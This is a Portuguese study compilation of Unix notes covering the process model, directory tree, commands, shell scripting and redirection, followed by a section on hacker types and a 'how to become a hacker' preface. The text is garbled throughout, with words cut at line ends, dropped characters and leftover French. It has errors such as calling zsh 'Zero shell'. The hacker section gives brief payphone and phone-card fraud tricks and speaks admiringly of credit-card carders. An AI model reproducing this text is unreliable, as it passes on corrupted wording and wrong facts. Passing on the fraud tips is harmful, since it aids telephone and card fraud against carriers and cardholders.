Sunteți pe pagina 1din 38

UNIX

Unix é um sistema operativo (ou sistema operacional) portátil (ou portável), multitare
fa e multiutilizador (ou multiusuário) originalmente criado por Ken Thompson, que
trabalhava nos Laboratórios Bell (Bell Labs) da AT&T. A marca UNIX é uma propriedade
do The Open Group, um consórcio formado por empresas de informática.
Sistema operacional multitarefa
Multitarefa significa executar uma ou mais tarefas ou processos simultaneamente.
Na verdade, em um sistema monoprocessado, os processos são executados seqüencialmen
te de forma tão rápida que parecem estar sendo executados simultaneamente. O Unix es
calona sua execução e reserva-lhes recursos computacionais (intervalo de tempo de pr
ocessamento, espaço em memória RAM, espaço no disco rígido, etc.).
O Unix é um sistema operacional de multitarefa preemptiva. Isso significa que, qua
ndo esgota-se um determinado intervalo de tempo (chamado quantum), o Unix suspen
de a execução do processo, salva o seu contexto (informações necessárias para a execução do
ocesso), para que ele possa ser retomado posteriormente, e coloca em execução o próxim
o processo da fila de espera. O Unix também determina quando cada processo será exec
utado, a duração de sua execução e a sua prioridade sobre os outros.
A multitarefa, além de fazer com que o conjunto de tarefas seja executado mais rap
idamente, ainda permite que o usuário e o computador fiquem livres para realizarem
outras tarefas com o tempo economizado.
Sistema operacional multiutilizador
Uma característica importante do Unix é ser multiusuário (multiutilizador). Bovet e Ce
sati [4] definem um sistema multiusuário como "aquele capaz de executar, concorren
te e independentemente, várias aplicações pertencentes a dois ou mais usuários". O Unix
possibilita que vários usuários usem um mesmo computador simultaneamente, geralmente
por meio de terminais. Cada terminal é composto de um monitor, um teclado e, even
tualmente, um mouse. Vários terminais podem ser conectados ao mesmo computador num
sistema Unix. Há alguns anos eram usadas conexões seriais, mas atualmente é mais comu
m o uso de redes locais, principalmente para o uso de terminais gráficos (ou termi
nais X), usando o protocolo XDMCP.
O Unix gerencia os pedidos que os usuários fazem, evitando que um interfira com ou
tros. Cada usuário possui direitos de propriedade e permissões sobre arquivos. Quais
quer arquivos modificados pelo usuário conservarão esses direitos. Programas executa
dos por um usuário comum estarão limitados em termos de quais arquivos poderão acessar
.
O sistema Unix possui dois tipos de usuários: o usuário root (também conhecido como su
perusuário), que possui a missão de administrar o sistema, podendo manipular todos o
s recursos do sistema operacional; e os usuários comuns, que possuem direitos limi
tados.
Para que o sistema opere adequadamente em modo multiusuário, existem alguns mecani
smos: (i) um sistema de autenticação para identificação de cada usuário (o programa login,
p.ex., autentica o usuário verificando uma base de dados, normalmente armazenada
no arquivo /etc/passwd); (ii) sistema de arquivos com permissões e propriedades so
bre arquivos (os direitos anteriormente citados); (iii) proteção de memória, impedindo
que um processo de usuário acesse dados ou interfira com outro processo. Esse últim
o mecanismo é implementado com a ajuda do hardware, que consiste na divisão do ambie
nte de processamento e memória em modo supervisor (ou modo núcleo) e modo usuário.
Arquivos de dispositivo
Uma característica singular no Unix (e seus derivados) é a utilização intensiva do conce
ito de arquivo. Quase todos os dispositivos são tratados como arquivos e, como tai
s, seu acesso é obtido mediante a utilização das chamadas de sistema open, read, write
e close.
Os dispositivos de entrada e saída são classificados como sendo de bloco (disco, p.e
x.) ou de caractere (impressora, modem, etc.) e são associados a arquivos mantidos
no diretório /dev (v. detalhamento mais adiante).
Estrutura

A estrutura do sistema Unix.


Um sistema Unix consiste, basicamente, de duas partes:
núcleo - o núcleo do sistema operacional, a parte que relaciona-se diretamente com
hardware, e que executa num espaço de memória privilegiado. Agenda processos, geren
cia a memória, controla o acesso a arquivos e a dispositivos de hardware (estes, p
or meio dos controladores de disposito - drivers - e interrupções). O acesso ao núcleo
é feito por chamadas de sistema, que são funções fornecidas pelo núcleo; essas funções são
onibilizadas para as aplicações por bibliotecas de sistema C (libc).
programas de sistema - são aplicações, que executam em espaços de memória não privi
e que fazem a interface entre o usuário e o núcleo. Consistem, principalmente, de:
Conjunto de bibliotecas C (libc)
Shell - um ambiente que permite que o usuário digite comandos.
Programas utilitários diversos - são programas usados para manipular arquivos, cont
olar processos, etc.
Ambiente gráfico (GUI) graphics user interface - eventualmente utiliza-se também um
ambiente gráfico para facilitar a interação do usuário com o sistema.
Em um sistema Unix, o espaço de memória utilizado pelo núcleo é denominado espaço do núcleo
ou supervisor (em inglês: kernel space); a área de memória para os outros programas é de
nominada espaço do usuário (user space). Essa separação é um mecanismo de proteção que impe
que programas comuns interfiram com o sistema operacional
Processos
Um processo, na visão mais simples, é uma instância de um programa em execução. Um program
a, para ser executado, deve ser carregado em memória; a área de memória utilizada é divi
dida em três partes: código (text), dados inicializados (data) e pilha (stack).
Por ser um sistema multitarefa, o Unix utiliza uma estrutura chamada tabela de p
rocessos, que contém informações sobre cada processo, tais como: identificação do processo
(PID), dono, área de memória utilizada, estado (status). Apenas um processo pode oc
upar o processador em cada instante - o processo encontra-se no estado "executan
do" (running). Os outros processos podem estar "prontos" (ready), aguardando na
fila de processos, ou então estão "dormindo" (asleep), esperando alguma condição que per
mita sua execução.
Um processo em execução pode ser retirado do processador por duas razões: (i) necessit
a acessar algum recurso, fazendo uma chamada de sistema - neste caso, após sua ret
irada do processador, seu estado será alterado para "dormindo", até que o recurso se
ja liberado pelo núcleo; (ii) o núcleo pode interromper o processo (preempção) - neste c
aso, o processo irá para a fila de processos (estado "pronto"), aguardando nova op
ortunidade para executar - ou porque a fatia de tempo esgotou-se, ou porque o núcl
eo necessita realizar alguma tarefa.
Existem quatro chamadas de sistema principais associadas a processos: fork, exec
, exit e wait. fork é usada para criar um novo processo, que irá executar o mesmo códi
go (programa) do programa chamador (processo-pai); exec irá determinar o código a se
r executado pelo processo chamado (processo-filho); exit termina o processo; wai
t faz a sincronização entre a finalização do processo-filho e o processo-pai.
Sistema de arquivos
Sistema de arquivos é uma estrutura lógica que possibilita o armazenamento e recuper
ação de arquivos. No Unix, arquivos são contidos em diretórios (ou pastas), os quais são c
onectados em uma árvore que começa no diretório raiz (designado por /). Mesmo os arqui
vos que se encontram em dispositivos de armazenamento diferentes (discos rígidos,
disquetes, CDs, DVDs, sistemas de arquivos em rede) precisam ser conectados à árvore
para que seu conteúdo possa ser acessado. Cada dispositivo de armazenamento possu
i a sua própria árvore de diretórios.
O processo de conectar a árvore de diretórios de um dispositivo de armazenamento à árvor
e de diretórios raiz é chamado de "montar dispositivo de armazenamento" (montagem) e
é realizada por meio do comando mount. A montagem associa o dispositivo a um subd
iretório.
Estrutura de diretórios
A árvore de diretórios do Unix é dividida em várias ramificações menores e pode variar de u
a versão para outra. Os diretórios mais comuns são os seguintes:
/ Diretório raiz - este é o diretório principal do sistema. Dentro dele estão todos os d
iretórios do sistema.
/bin Contém arquivos, programas do sistema, que são usados com freqüência pelos usuários.
/boot Contém arquivos necessários para a inicialização do sistema.
/dev Contém arquivos usados para acessar dispositivos (periféricos) existentes no co
mputador.
/etc Arquivos de configuração de seu computador local.
/home Diretórios contendo os arquivos dos usuários.
/lib Bibliotecas compartilhadas pelos programas do sistema e módulos do núcleo.
/mnt Diretório de montagem de dispositivos.
/mnt/cdrom Subdiretório onde são montados os CDs. Após a montagem, o conteúdo do CD se e
ncontrará dentro deste diretório.
/mnt/floppy Subdiretório onde são montados os disquetes. Após a montagem, o conteúdo do
disquete se encontrará dentro deste diretório.
/proc Sistema de arquivos do núcleo. Este diretório não existe, ele é colocado lá pelo nú
o e usado por diversos programas.
/root Diretório do usuário root.
/sbin Diretório de programas usados pelo superusuário (root) para administração e contro
le do funcionamento do sistema.
/tmp Diretório para armazenamento de arquivos temporários criados por programas.
/usr Contém maior parte de seus programas. Normalmente acessível somente como leitur
a.
/var Contém maior parte dos arquivos que são gravados com freqüência pelos programas do
sistema.
Particularidades
Um sistema Unix é orientado a arquivos, quase tudo nele é arquivo. Seus comandos são n
a verdade arquivos executáveis, que são encontrados em lugares previsíveis em sua árvore
de diretórios, e até mesmo a comunicação entre entidades e processos é feita por estrutur
as parecidas com arquivos. O acesso a arquivos é organizado através de propriedades
e proteções. Toda a segurança do sistema depende, em grande parte, da combinação entre as
propriedades e proteções definidas em seus arquivos e suas contas de usuários.
Aplicações
O Unix permite a execução de pacotes de softwares aplicativos para apoio às diversas a
tividades empresariais. Dentre estes pacotes destacam-se:
geradores gráficos
planilhas eletrônicas
processadores de textos
geradores de aplicações
linguagens de 4° geração
banco de dados
O Unix possui recursos de apoio à comunicação de dados, que proporcionam sua integração co
m outros sistemas Unix, e até com outros sistemas operacionais distintos. A integr
ação com sistemas heterogêneos permite as seguintes facilidades:
compartilhamento de recursos e informações
transferência de informações
comunicação entre usuários remotos
submissão de programas para serem executados em computadores remotos
utilização dos terminais de uma máquina Unix como terminais de outras máquinas remo
mesmo com sistemas operacionais distintos.
Para última, o Unix oferece um ambiente integrado e amigável, voltado para a gestão au
tomatizada de escritório, com serviços que atenderão às seguintes áreas:
arquivamento eletrônico de informações
processador de documentos
agenda e calendário
calculadora
correio eletrônico

X Window System
Além do shell, o Unix suporta interface gráfica para o usuário. Nas primeiras versões do
Unix as interfaces do usuário eram baseadas apenas em caracteres (modo texto) e o
sistema compunha-se apenas do núcleo, de bibliotecas de sistema, do shell e de al
guns outros aplicativos. As versões mais recentes do Unix, além de manterem o shell
e seus comandos, incluem o X Window System que, graças ao gerenciador de exibição e ao
gerenciador de janelas, possui uma interface atraente e intuitiva que aumenta e
m muito a produtividade do usuário.
Desenvolvido no MIT (Massachussets Institute of Technology), o X Window System (
também pode ser chamado de Xwindow) tornou-se o sistema gráfico do Unix. O Xwindow f
unciona como gerenciador de exibição e por si só, não faz muita coisa. Para termos um am
biente gráfico produtivo e completo, precisamos também de um gerenciador de janelas.
O gerenciador de janelas proporciona ao ambiente gráfico a aparência e as funcionali
dades esperadas incluindo as bordas das janelas, botões, truques de mouse, menus e
tc. Como no sistema Unix o gerenciador de exibição (X Window System) é separado do ger
enciador de janelas, dizemos que seu ambiente gráfico é do tipo cliente-servidor. O
Xwindow funciona como servidor e interage diretamente com o mouse, o teclado e o
vídeo. O gerenciador de janelas funciona como cliente e se aproveita dos recursos
disponibilizados pelo Xwindow.
O fato de o Unix possuir o gerenciador de exibição (Xwindow) separado do gerenciador
de janelas tornou possível o surgimento de dezenas de gerenciadores de janelas di
ferentes. Os gerenciadores de janelas mais comuns no mundo Unix são o Motif, Open
Look, e o CDE. Também existem outros gerenciadores de janelas que são bastante utili
zados no Unix, principalmente nos sistemas Unix-Like (versões gratuitas e clones d
o Unix). São eles: KDE, Gnome, FVWM, BlackBox, Enlightenment, WindowMaker etc.
Comandos
Esta é uma lista de programas de computador para o sistema operacional Unix e os s
istemas compatíveis, como o Linux. Os comandos do Unix tornam-se acessíveis ao usuário
a partir do momento em que ele realiza o login no sistema. Se o usuário utiliza t
ais comandos, então ele se encontra no modo shell, também chamado de modo texto (ou
Unix tradicional). Quando estiver utilizando o modo gráfico, o usuário também poderá se
utilizar de tais comandos desde que abra uma janela de terminal (Xterm).
A linha de comando do sistema operacional Unix permite a realização de inúmeras tarefa
s através de seus comandos, de manipulação de arquivos a verificação do tráfego em rede. Pa
a exibir uma descrição detalhada de cada comando abra uma console ou xterm e digite
man comando, onde comando é o comando em questão.

Comandos de manipulação de diretório


mkdir - Cria um diretório vazio exemplo: mkdir docs
rmdir - Exclui um diretorio (se estiver vazio)
rm -rf - Exclui um diretório e todo o seu conteúdo (cuidado com este comando)
cd - Entra num diretório (exemplo: cd docs) ou retorna para HOME
cd / - Muda para o diretório raiz
cd ~ - vai direto para o diretório home do usuário logado.
cd - - volta ao último diretório acessado
pwd - Exibe o local do diretório atual
ls - Lista o conteúdo do diretório
ls -alh - Mostra o conteúdo detalhado do diretório
ls -a - Exibe os arquivos "ocultos" do determinado diretório.
ls -ltr - Mostra os arquivos no formado longo(l) em ordem inversa(r) de data (t)
df - Mostra a utilização dos sistemas de arquivos montados
du -msh - Mostra o tamanho do diretório em Megabytes
whereis - Mostra onde se encontra determinado arquivo (binários) exemplo: whereis
samba
Gerenciador de janelas Window Maker.
Comandos para manipulação de arquivos
cat - Mostra o conteúdo de um arquivo binário ou texto
tac - Semelhante ao cat mas inverte a ordem
tail - Mostra as últimas linhas
de um arquivo. Ex: tail -f <arquivo> Útil para visualizar arquivos de log continua
mente.
head - Mostra as primeiras linhas de um arquivo. Ex: head -100 visualiza as 100
primeiras linhas do arquivo.
less - Mostra o conteúdo de um arquivo de texto com controle
vi - Editor de ficheiros de texto
vim - Versão melhorada do editor supracitado
rm - Remoção de arquivos (também remove diretórios, mas com o parâmetro -r, que significa
recursividade)
cp - Copia diretórios 'cp -r' copia recursivamente
mv - Move ou renomeia arquivos e diretórios
chmod - Altera as permissões de arquivos ou directórios
chown - Altera o dono de arquivos ou directórios
cmd>txt - Cria um novo arquivo(txt) com o resultado do comando(cmd)
cmd>>txt - Adiciona o resultado do comando(cmd) ao fim do arquivo(txt)
touch touch foo.txt - Cria um arquivo foo.txt vazio; também altera data e hora de
modificação para agora
> arquivo.txt - Mais rápido que o touch para criação de arquivos
split - Divide um arquivo
recode - Recodifica um arquivo ex: recode iso-8859-15..utf8 file_to_change.txt
Comandos para administração
man - Mostra o manual do comando.
adduser - Adiciona usuários. O useradd pode também ser usado.
addgroup - Adiciona grupos. o group add pode também ser usado.
apropos - Realiza pesquisa por palavra ou string
dmesg - Exibe as mensagens da inicialização(log)
du - Exibe estado de ocupação dos discos/partições
find - Comando de busca ex: find ~/ -cmin -3
userdel - Remove usuários
usermod - Modifica informações de um determinado usuário.
groupmod - Modifica informações de um determinado grupo.
chfn - Altera informação relativa a um utilizador
who - Informa quem está logado no sistema.em algumas versões do linux, o comando w p
ode ser usado, e retorna informações mais detalhadas, como o shell do usuário.
whoami - Informa com qual usuário você está logado
passwd - Modifica senha (password) de usuários
umask - Define padrões de criação de arquivos e diretórios
ps - Mostra os processos correntes
ps -aux - Mostra todos os processos correntes no sistema
kill - Mata um processo
killall - Mata todos os processos com o nome informado
su - Troca para o super-usuário root (é exigida a senha)
su user - Troca para o usuário especificado em 'user' (é exigida a senha)
chown - Altera o proprietário de arquivos e pastas (dono)

Comandos para administração de rede


ifconfig - mostra as interfaces de redes ativas e as informações relacionadas a cada
uma delas
route - Mostra as informações referentes as rotas
mtr - Mostra rota até determinado IP
netstat - Exibe as portas e protocolos abertos no sistema.
iptraf - Analisador de trafego da rede com interface gráfica baseada em diálogos
tcpdump - Sniffer muito popular. Sniffer é uma ferramenta que "ouve" os pacotes qu
e estão passando pela rede.
traceroute Traça uma rota do host local até o destino mostrando os roteadores interm
ediários
nslookup - Consultas a serviços DNS
dig - Consultas a serviços DNS

Shell
Antes de saber o que é um script em shell, é importante saber o que é um Shell.
Na linha de comandos de um shell, podemos utilizar diversos comandos um após o out
ro, ou mesmo combiná-los numa mesma linha. Se colocarmos diversas linhas de comand
os em um arquivo texto simples, teremos em mãos um Shell Script, ou um script em s
hell, já que Script é uma descrição geral de qualquer programa escrito em linguagem inte
rpretada, ou seja, não compilada. Outros exemplos de linguagens para scripts são o P
HP, Perl, Python, JavaScript e muitos outros. Podemos então ter um script em php,
um script perl e assim em diante.
Uma vez criado, um ShellScript pode ser reutilizado quantas vezes for necessário.
Seu uso, portanto, é indicado na automação de tarefas que serão realizadas mais de uma v
ez. Todo sistema Unix e similares são repletos de scripts em shell para a realização d
as mais diversas atividades administrativas e de manutenção do sistema.
Os arquivos de lote (batch - arquivos *.bat) do windows são também exemplos de Shell
Scripts, já que são escritos em linguagem interpretada e executados por um Shell do
Windows, em geral o command.com ou hoje em dia o cmd.exe. Os Shells do Unix, porém
, são inumeras vezes mais poderosos que o interpretador de comandos do windows, po
dendo executar tarefas muito mais complexas e elaboradas.
Os scripts shell podem ser agendados para execução através da tabela crontab, entre ou
tras coisas. É uma ferramenta indispensável aos administradores de sistemas Unix.
O Shell mais comum e provavelmente o que possui mais scripts escritos para ele é t
ambém um dos mais antigos e simples, o sh. Este shell está presente em todo o sistem
a tipo Unix, incluído o Linux, FreeBSD, AIX, HP-UX, OpenBSD, Solaris, NetBSD, Irix
, etc. Por ser o shell nativo mais comum é natural que se prefira escrever scripts
para ele, tornando o script mais facilmente portável para outro sistema.
Os Shells não estão diretamente associados a um ou outro tipo de Unix, embora várias e
mpresas comerciais tenham suas próprias versões de Shell. No software livre o Shell
utilizado em um sistema em geral é exatamente o mesmo utilizado em outro. Por exem
plo, o bash encontrado no Linux é o mesmo shell bash encontrado no FreeBSD e pode
também facilmente ser instalado no Solaris, Windows através do Cygwin [1] ou outros
sistemas Unix comerciais para passar a ser utilizado como interface direta de co
mandos ou como interpretador de scripts. O mesmo acontece com o tcsh e vários outr
os shells desenvolvidos no modelo de software livre.
Características
Os scripts shell podem conter estruturas de programação tais como:
estruturas de decisão (if)
estruturas de repetição (for)(while)
funções e argumentos
definições de variáveis e escopo destas
Shell script é uma linguagem de script usada em vários sistemas operativos (operaci
nais), com diferentes dialetos, dependendo do interpretador de comandos utilizad
o. Um exemplo de interpretador de comandos é o bash, usado na grande maioria das d
istribuições GNU/Linux.
A maior parte dos usuários classificam shell script como uma linguagem de fácil apr
ndizagem. O primeiro passo é, saber o que se deseja fazer, então ver qual o código que
executa este comando em shell e aí criar, basta escrever o código em algum editor d
e texto e salvar. Depois de salvo você tem que executar o arquivo, dessa forma:
./"Nome do arquivo, sem aspas"
No Linux o script tem que ter permissão de execução, isto pode ser feito com o coma
chmod +x "arquivo", para exibir um manual do bash ou mesmo do comando 'chmod',
digite na linha de comando 'man bash' ou 'man chmod' (sem aspas).
É possível executar o arquivo mesmo sem modificar a permissão de execução, por exem
for um arquivo escrito para ser executado pelo bash, usar:
sh ./"Nome do arquivo, sem aspas"
Introdução à shell
O intérprete de comandos é o interface entre o utilizador e o sistema de exploração, daí o
seu nome inglês shell , que significa casca .
A Shell está então encarregue de ser o intermediário entre o sistema de exploração e o uti
lizador graças às linhas de comando escritas por este. O seu papel consiste assim em
ler a linha de comando, interpretar o seu significado, executar o comando, segu
idamente devolver o resultado às saídas.
A shell é assim um ficheiro executável, encarregue de interpretar os comandos, trans
miti-los ao sistema e devolver o resultado. Existem várias shells, sendo as mais u
suais sh (chamada Bourne shell ), bash ( Bourne again shell ), csh ( C Shell ), Tcsh ( Ten
C shell ), ksh ( Korn shell ) e zsh ( Zero shell ). Onome corresponde geralmente ao nome d
o executável.
Cada utilizador possui uma shell por defeito, que será lançada durante a abertura de
comando. A shell por defeito está definida no ficheiro de configuração /etc/passwd no
último campo da linha que corresponde ao utilizador. É possível alterar a shell numa
sessão, executando muito simplesmente o ficheiro executável correspondente, por exem
plo:
/bin/bash
Convide de comando (rápido)
A shell inicia-se lendo a sua configuração global (num ficheiro do directório /etc/),
de seguida lendo a configuração própria ao utilizador (num ficheiro escondido, cujo no
me começa por um ponto, situado no directório básico do utilizador, quer dizer /home/n
om_de_l_utilisateur/.fichier_de_configuration), posteriormente afixa um convite
de comando (em inglês prompt) do seguinte modo:
machine:/repertoire/courant$
Por defeito, na maior parte das shells o prompt é composto pelo nome da máquina, seg
uido de dois pontos (:), do directório corrente, seguido de um carácter que indica o
tipo de utilizador conectado:
«$» indica que se trata de um utilizador normal
«#»indica que se trata do administrador, chamado root

Noção de linha de comando


Uma linha de comando é uma cadeia de caracteres constituída por um comando, correspo
ndente a um ficheiro executável do sistema, ou por um comando shell bem como os ar
gumentos (parâmetros) opcionais :
ls -al /home/jf/
No comando acima, ls é o nome do comando, - Al e /home/jean-francois/ são argumentos
. Os argumentos que começam - designam-se opções. Para cada comando existem geralmente
diversas opções que podem ser detalhadas escrevendo um dos seguintes comandos:
commande --help
commande -?
man commande
Quadro dos principais comandos Linux
Comando Descrição equivalente DOS
ls lista o conteúdo de um directório dir
cd muda de directório cd
cd .. directório parente cd..
mkdir cria um novo directório md
rmdir suprime um directório deltree
cp cópia de ficheiro copy, xcopy
mv deslocação de ficheiro move
rm suprime o ficheiro del
passwd alterar a palavra-passe do utilizador
cat mostra o conteúdo do ficheiro type
more mostra o conteúdo do ficheiro com pausas type |more
man
apropos ajuda sobre o comando pedido help
lpr imprime o ficheiro pedido print
chmod alterar o atributo de um ficheiro
chmod XXX fichier
XXX= Utilizador|Grupo|Outros onde X representa um número inteiro 1<X<7
Leitura=4, Escrita=2, Execução=1
X=Leitura+Escrita+Execução
0 significa nenhum direito
1 significa direito de execução
2 significam direito em escrita
3 significam direito em escrita e execução
4 significam direito em leitura
5 significam direito em leitura e execução
6 significam direito em leitura e direito em escrita
7 significam todos os direitos
chfn alterar as informações pessoais vistas com finger
chsh muda a shell : chsh user emplacement_du_shell
finger lista dos utilizadores em linha
traceroute traça o caminho entre a máquina local e a máquina visada
ftp
[machine] [port]
get
put
quit transferência de ficheiro entre a máquina local e a máquina orienta
recupera um ficheiro
envia um ficheiro
abandona a sessão FTP
telnet [machine] efectua um telnet
talk permite falar com um utilizador ligado
talk user
mesg autoriza ou não o comando talk
mesg n : Impede a recepção de mensagens talk
mesg y : Permite a recepção de mensagens talk
logout desconexão

Entrada/saída standard
Aquando da execução de um comando, é criado um processo. Este vai então abrir três fluxos:
stdin, chamado entrada standard, no qual o processo vai ler os dados de entrada.
Por defeito, o stdin corresponde ao teclado; STDIN é identificado pelo número 0;
stdout, chamado saída standard, no qual o processo vai escrever os dados de saída.
or defeito, o stdin corresponde ao ecrã; STDOUT é identificado com o número 1;
stderr, chamado erro standard, no qual o processo vai escrever as mensagens de e
rro. Por defeito, o stderr corresponde ao ecrã. STDERR é identificado com o número 2;
Por defeito, quando se executa um programa, os dados são lidos a partir do teclado
e o programa envia a sua saída e os seus erros para o ecrã, mas é possível ler os dados
a partir de qualquer periférico de entrada, ou mesmo a partir de um ficheiro, e e
nviar a saída para um periférico de afixação, um ficheiro, etc.
Redireccionamentos
O Linux, como qualquer sistema de tipo Unix, possui mecanismos que permitem reen
caminhar os entrada/saída standard para ficheiros.
Assim, a utilização do carácter > permite reencaminhar a saída standard de um comando sit
ado à esquerda para o ficheiro situado à direita :
ls -al /home/jf/ > toto.txt
echo "Toto" > /etc/monfichierdeconfiguration
O comando seguinte é equivalente a uma cópia de ficheiros :
cat toto > toto2
O redireccionamento > tem como objectivo criar um novo ficheiro. Assim, se um fich
eiro do mesmo nome existir, este será esmagado. O seguinte comando cria simplesmen
te um ficheiro vazio :
> fichier
O emprego de um duplo carácter >> permite concatenar a saída standard para o ficheiro,
quer dizer, acrescentar a saída na sequência do ficheiro, sem o esmagar.
cat < toto.txt
De maneira análoga, o carácter < indica um redireccionamento da entrada standard. O co
mando seguinte envia o conteúdo do ficheiro toto.txt em entrada do comando cat, cu
jo único objectivo é afixar o conteúdo sobre a saída standard (exemplo inútil, mas pedagógi
o) :
cat << STOP
Tubos de comunicação (canos)
Os tubos (em ingleses pipes , literalmente "tubos") constituem um mecanismo de comu
nicação próprio a todos os sistemas UNIX. Um tubo, simbolizado por uma barra vertical
(carácter | ), permite afectar a saída standard de um comando a uma entrada standard de
outra, como um tubo que permite fazer comunicar a entrada standard de um comand
o com a saída standard de outra.
Assim, no exemplo seguinte, a saída standard do comando ls - Al é enviado para o pro
grama sort encarregue de fazer uma triagem do resultado por ordem alfabética:
ls -al | sort
Desta maneira é possível encadear diversos comandos por tubos sucessivos. No exemplo
seguinte, o comando afixa todos os ficheiros do directório corrente, selecciona a
s linhas que contêm a palavra zip (graças ao comando grep) e conta o número total de lin
has :
ls -l | grep zip | wc -l

Tipos de Hackers
Hacker
Na verdade, os hackers são os bons mocinhos. Para os fãs de Guerra nas Estrelas, pen
sem no hacker como o cavaleiro jedi bonzinho. Ele possui os mesmos poderes que o
jedi do lado negro da força (cracker) mas os utiliza para proteção. É um curioso por na
tureza, uma pessoa que têm em aprender e se desenvolver um hobby, assim como ajuda
r os "menos prevalecidos". Um bom exemplo real foi quando o cracker Kevin Mitnic
k invadiu o computador do analista de sistemas Shimomura. Mitnick destruiu dados
e roubou informações vitais. Shimomura é chamado de hacker pois usa sua inteligência pa
ra o bem, e possui muitos mais conhecimentos que seu inimigo digital. Assim faci
lmente montou um honeypot (armadilha que consiste em criar uma falsa rede para p
egar o invasor) e pegou Kevin. Infelizmente a imprensa confundiu os termos e tod
a notícia referente a baderneiros digitais se refere à hacker.
Cracker
Esses sim são os maldosos. Com um alto grau de conhecimento e nenhum respeito, inv
adem sistemas e podem apenas deixar a sua "marca" ou destruí-los completamente. Ge
ralmente são hackers que querem se vingar de algum operador, adolescentes que quer
em ser aceitos por grupos de crackers (ou script kiddies) e saem apagando tudo q
ue vêem ou mestres da programação que são pagos por empresas para fazerem espionagem ind
ustrial. Hackers e crackers costumam entrar muito em conflito. Guerras entre gru
pos é comum, e isso pode ser visto em muitos fóruns de discussão e em grandes empresas
, as quais contratam hackers para proteger seus sistemas.
Phreaker
Maníacos por telefonia. Essa é a maneira ideal de descrever os phreakers. Utilizam p
rogramas e equipamentos que fazem com que possam utilizar telefones gratuitament
e. O primeiro phreaker foi o Capitão Crunch, que descobriu que um pequeno apito en
contrado em pacotes de salgadinhos possui a mesma freqüência dos orelhões da AT&T, faz
endo com que discassem de graça. Um programa comum utilizado é o blue box, que gera
tons de 2600 pela placa de som, fazendo com que a companhia telefônica não reconheça a
chamada. Outra técnica muito usada principalmente no Brasil é a de utilizar um diod
o e um resistor em telefones públicos. Ou de cobrir o cartão telefônico de papel alumíni
o para que os creditos não acabem (essa técnica não funciona nos orelhões novos e nos ve
lhos vc pode tomar um belo choque!! acredite eu já tomei um e foi... CHOCANTE!!).
Técnicas como essas são utilizadas no mundo inteiro. O phreaker é uma categoria à parte,
podem ser hackers, crackers ou nenhum dos dois. Alguns phreakers brasileiros são
tão avançados que têm acesso direto à centrais de telefonia, podendo desligar ou ligar t
elefones, assim como apagar contas. Um dos programas muitos usados para isso é o o
zterm, programinha de terminal que funciona em modo DOS. Por sinal, muito difícil
de encontrar na net.

Script Kiddies

Sub-categoria de crackers. Não têm um alvo certo, vão tentando invadir tudo que vêm na f
rente usam ferramentas encontradas na Internet. Nem programar sabem. Mas tem um
conhecimento digital bem acima dos usuários comuns.

Lamer

Dificilmente aprendem a usar algum programa, não sabem e não tem condição de aprender co
mo as coisas funcionam. Aqueles que chegam nos chats anunciando "vou te invadir,
sou o melhor" mas acaba desistindo pois não consegue descompactar nem um arquivo
ZIP.

Carder

É o especialista em fraudes com cartões de crédito. Sabe como conseguir listas de cartõe
s válidos em sites que os utllizam (sites de compras, chat pago, etc.), gerar número
s falsos que passam pela verificação e mesmo roubar e clonar cartões verdadeiros. ( os
caras são bons mesmo!)
Tipos de Invasao
Muitas pessoas nos perguntam sobre os tipos de hackers e sobre crackers, phreake
rs, etc. Inicialmente, o termo hacker é o termo generalizado. Um cracker é um hacker
. Um wannabe é um hacker. Porém, um hacker não é necessariamente um phreaker, por exempl
o. Digamos que todo hacker possa ter uma especialidade, tal como um médico, por ex
emplo. Veja em quais desses tipos você se pode se encaixar:
WHITE-HAT: são os hackers que exploram problemas de segurança para divulgá-los para to
da a comunidade, a título de que os usuários saibam como devem se proteger.
BLACK-HAT: usam seus conhecimentos em benefício próprio e, geralmente, estão ligados a
atividades ilícitas.São geralmente perigosos e difíceis de identificar, pois nunca te
ntarão chamar atenção.
CRACKER: alguns classificam cracker como aqueles que tem por objetivo invadir si
stemas ou redes apenas pelo desafio. Porém, historicamente, o nome cracker está liga
do a modificação de código, para obter funcionalidades que não existem ou, de certa form
a, limitadas. Você já ouviu falar em cracks ou patches para programas?
PHREAKER: sua especialidade é interferir o curso normal de funcionamento das centr
ais telefônicas, mudar rotas, números, realizar chamadas sem tarifação, bem como realiza
r chamadas sem ser detectado.
WANNABE: é aquele que acha que sabe, diz para todos que sabe, divulga abertamente
suas "façanhas" e na grande maioria dos casos usam informações já conhecidos, as famosas
"receitas de bolo." Eles geralmente atacam apenas para testar suas descobertas
e a maioria deles não possui nenhum escrúpulo. São frequentemente encontrados no progr
ama de bate-pap mIRC.
Esses são os tipos de hackers mais famosos. Se você conhecer mais algum tipo, ou tiv
er alguma dúvida, entre em contato conosco.
Como se um HACKER
ADVERTENCIA:
Este documento foi criado para informacao apenas. De nenhuma forma, encorajando
qualquer tipo de atividade ilegal, e qualquer ato praticado apos a leitura deste
documento é de inteira
responsabilidade do leitor. Se nao concorda com este fato, retorne agora.
________________________________________________________________________________
_______________

- Como me Transformar em um Hacker?


Parece que muitas e muitas pessoas, todos os dias fazem esta pergunta em grupos
de noticias, atraves de
e-mail, em salas de chat. Nao ha nenhuma resposta simples, desde que cada um dev
e seguir seu proprio
caminho. Mas ha uma coisa que voce deve ter para almejar o status de um hacker:
determinacao! Voce deve
ter um apetite voraz para encontrar informacao e ensinar a si mesmo. Voce nao po
de contar com outros, nao
pode contar com a escola. O curso de digitacao nao o levara a lugar algum.

- Conseguindo Ajuda
E verdade que existe centenas e centenas de home pages de "hackers" na Internet.
Se voce nunca tentou
enviar um e-mail para algum deles, uma coisa certamente se torna evidente, a fal
ta de conhecimento. Qualquer
pessoa (eu inclusive!) pode colocar uma pagina na Internet, adicionando links, t
extos,... de outros e se chamar
um hacker. Mas peca por ajuda para escrever um shel script para explorar um bug
e voce ficara ligeiramente
disapontado. Claro! ha alguns hackers genuinos por ai, e se voce conseguir encon
tra-los, podera pedir ajuda.
Mas ai voce estara dependendo de alguem para tudo. Um hacker deve ser autoditada
.

- Algumas Outras Necessidades


É importante saber e aceitar que voce estara sob fogo, quando outros ouvirem sobre
o seu interesse em se
tornar um hacker. E para ser esperado: voce esta tentando ser parte de uma minor
ia que e odiada pelo
grande publico da area, por causa de imagem ruim que e comumente difundida. Deve
discordar de
comentarios negativos e de julgamentos apressados. E finalmente, voce deve ser h
umilde para se tornar um
hacker. E absolutamente necessario admitir que voce sabe apenas 1 por cento do q
ue ha para se saber sobre
o mundo da informatica e seus pecados, no objetivo de sempre direcionar seus esf
orcos para aprender mais.
